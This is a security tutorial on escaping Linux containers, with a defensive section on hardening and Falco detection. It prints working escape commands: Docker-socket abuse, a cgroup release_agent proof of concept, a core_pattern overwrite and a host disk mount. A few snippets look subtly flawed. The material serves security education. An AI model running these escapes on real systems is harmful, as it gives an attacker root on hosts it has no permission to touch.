Breaking Out: A Practical Guide to Linux Container Escape Techniques

Tools & Defense
Time it takes to read this article 6 minutes.

Disclaimer: This article is for education and authorized security testing only. Run these techniques exclusively against systems you own or have explicit, written permission to test. Container escape on production infrastructure without authorization is illegal and unethical.

Introduction / Overview

Containers are often mistaken for security boundaries. They are not. A container is a Linux process with namespaces, cgroups, and capability restrictions wrapped around it — all of which share the host kernel. When a workload is misconfigured (or an attacker chains a kernel bug), that "boundary" dissolves and you land on the host as root.

In this article you'll learn the most reliable, real-world container escape primitives: the privileged container, abusing a host mount, the classic cgroups release_agent trick, leaking host context through /proc, and what CAP_SYS_ADMIN actually unlocks. We'll walk through a reproducible lab, then give the blue team equal time with concrete detection and hardening guidance.

How it works / Background

A container's isolation comes from three kernel features:

  • Namespaces (pid, net, mnt, uts, ipc, user) give the process a private view of system resources.
  • cgroups limit and account for resource usage (CPU, memory, devices).
  • Capabilities slice root's powers into ~40 distinct bits. A default Docker container drops dangerous ones like CAP_SYS_ADMIN and CAP_SYS_MODULE.

Escape happens when one of these guardrails is removed or abused:

  • --privileged disables all of them: full capability set, no seccomp/AppArmor confinement, and host devices appear under /dev.
  • A host directory bind-mounted into the container (e.g. -v /:/host or a mounted Docker socket) hands you the filesystem directly.
  • CAP_SYS_ADMIN lets you call mount(2), manipulate cgroups, and set up the release_agent escape.
  • /proc exposes host-level knobs like /proc/sys/kernel/core_pattern and host PIDs when the PID namespace is shared.

Prerequisites / Lab setup

You need a Linux host with Docker and root inside the test container. Spin up a deliberately weak target:

# Privileged container (worst case)
docker run --rm -it --privileged --name escape-lab ubuntu:22.04 bash

# Or: capability-only target
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined \
  ubuntu:22.04 bash
Bash

Inside the container, confirm what you're working with:

# What capabilities do we have?
capsh --print | grep sys_admin

# Are we privileged? Check device access.
ls -la /dev | head

# Decode the bounding set quickly
grep CapEff /proc/self/status
# CapEff: 000001ffffffffff  -> full set == privileged
Bash

capsh --decode=000001ffffffffff confirms the effective set. A value of 000001ffffffffff means every capability is present.

Attack walkthrough / PoC

1. The mounted Docker socket

The single most common finding. If /var/run/docker.sock is mounted into the container, you control the host's Docker daemon and can launch a new privileged container that mounts the host root:

# Detect it
ls -la /var/run/docker.sock

# If the docker CLI is present:
docker run -v /:/host --rm -it alpine chroot /host sh
# You are now root on the host filesystem.
Bash

2. cgroups release_agent escape (needs CAP_SYS_ADMIN)

The classic notify_on_release / release_agent technique. With CAP_SYS_ADMIN you can mount an RDMA/memory cgroup, set a host-side release_agent, and have the kernel execute it as root on the host when the last task leaves the cgroup.

# Mount a cgroup controller we control
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp
mkdir /tmp/cgrp/x

# Enable release notification
echo 1 > /tmp/cgrp/x/notify_on_release

# Find the container's path on the host via the overlay mount
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab | head -1)

# Point release_agent at a script on the HOST filesystem
echo "$host_path/cmd" > /tmp/cgrp/release_agent

# Drop the payload
cat > /cmd <<'EOF'
#!/bin/sh
ps aux > "$host_path/output"
EOF
chmod a+x /cmd

# Trigger: spawn a process that immediately exits the cgroup
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

# Host-side output now contains host process list
cat /output
Bash

Note: this technique works on cgroup v1. Many modern distros default to cgroup v2 (unified hierarchy), where release_agent is not directly writable the same way — a useful detail when scoping an engagement.

3. core_pattern via /proc (needs CAP_SYS_ADMIN + same mount ns reach)

/proc/sys/kernel/core_pattern is a host-global setting. If writable, you redirect crash handling to a binary that runs as root on the host:

echo "|/proc/sys/kernel/core_pattern_handler %P" > /proc/sys/kernel/core_pattern
# Then trigger a segfault in a process to invoke the handler.
Bash

4. Privileged: mount the host disk directly

With --privileged, host block devices are visible. Just mount the root partition:

fdisk -l                       # enumerate host disks
mkdir /mnt/host
mount /dev/sda1 /mnt/host      # or the relevant root partition
chroot /mnt/host               # full host root shell
Bash

5. Known CVEs worth remembering

  • CVE-2019-5736 — overwriting the host runc binary from inside a container, leading to root on the host.
  • CVE-2022-0492 — cgroups v1 release_agent escape achievable from an unprivileged container in certain configs because the capability check was missing.
  • CVE-2024-21626 — runc file-descriptor leak (WORKDIR / leaked fd) enabling escape during docker build/run.

Mermaid diagram

Breaking Out: A Practical Guide to Linux Container Escape Techniques diagram 1

The diagram shows four escape paths — Docker socket, privileged disk mount, CAP_SYS_ADMIN abuse, and runc CVEs — all converging on root code execution on the host.

Detection & Defense (Blue Team)

Defense matters as much as the attack. Apply these in layers.

1. Never run --privileged; drop capabilities by default.

docker run --cap-drop=ALL --cap-add=NET_BIND_SERVICE \
  --security-opt no-new-privileges \
  --read-only myimage
Bash

In Kubernetes, enforce this with Pod Security Standards (restricted) or an admission controller:

securityContext:
  privileged: false
  allowPrivilegeEscalation: false
  readOnlyRootFilesystem: true
  capabilities:
    drop: ["ALL"]
YAML

2. Never mount the Docker socket into a workload. If a build system needs Docker, use rootless mode, Kaniko, or BuildKit instead.

3. Keep seccomp and AppArmor/SELinux enabled. Docker's default seccomp profile blocks mount(2), ptrace across namespaces, and many escape syscalls. --security-opt apparmor=unconfined and --security-opt seccomp=unconfined should be treated as red flags in audits.

4. Use user namespaces / rootless containers so in-container root maps to an unprivileged host UID.

5. Patch runc, containerd, and the kernel — CVE-2019-5736 and CVE-2024-21626 were both fixed in runc; pin minimum versions.

6. Detection at runtime. Deploy Falco with rules that fire on escape behavior:

- rule: Detect release_agent File Container Escapes
  condition: open_write and fd.name endswith release_agent
  output: "Possible cgroup escape (file=%fd.name proc=%proc.cmdline)"
  priority: CRITICAL
YAML

Falco's default ruleset already flags "Launch Privileged Container", "Mount Launched in Privileged Container", and writes to sensitive /proc paths. Pair this with auditd watches on core_pattern and release_agent, and scan images/configs in CI with kube-bench and trivy config.

7. Audit for the markers an attacker looks for: mounted docker.sock, hostPath volumes, hostPID: true, and CAP_SYS_ADMIN. These map to MITRE ATT&CK T1611 — Escape to Host.

For related lateral movement and privilege concepts, see Linux privilege escalation techniques, Kubernetes RBAC abuse, and Docker security hardening.

Conclusion

Container escape is almost always a configuration problem, not a kernel-bug problem. The four primitives — privileged mode, host mounts (especially docker.sock), CAP_SYS_ADMIN-driven cgroups//proc abuse, and unpatched runc — account for the overwhelming majority of real-world breakouts. As an attacker, enumerate capabilities and mounts first. As a defender, drop capabilities, forbid the socket, keep seccomp/AppArmor on, patch runc, and watch for the escape signatures with Falco. Treat the container as one layer of defense, never the only one.

References

Comments

Copied title and URL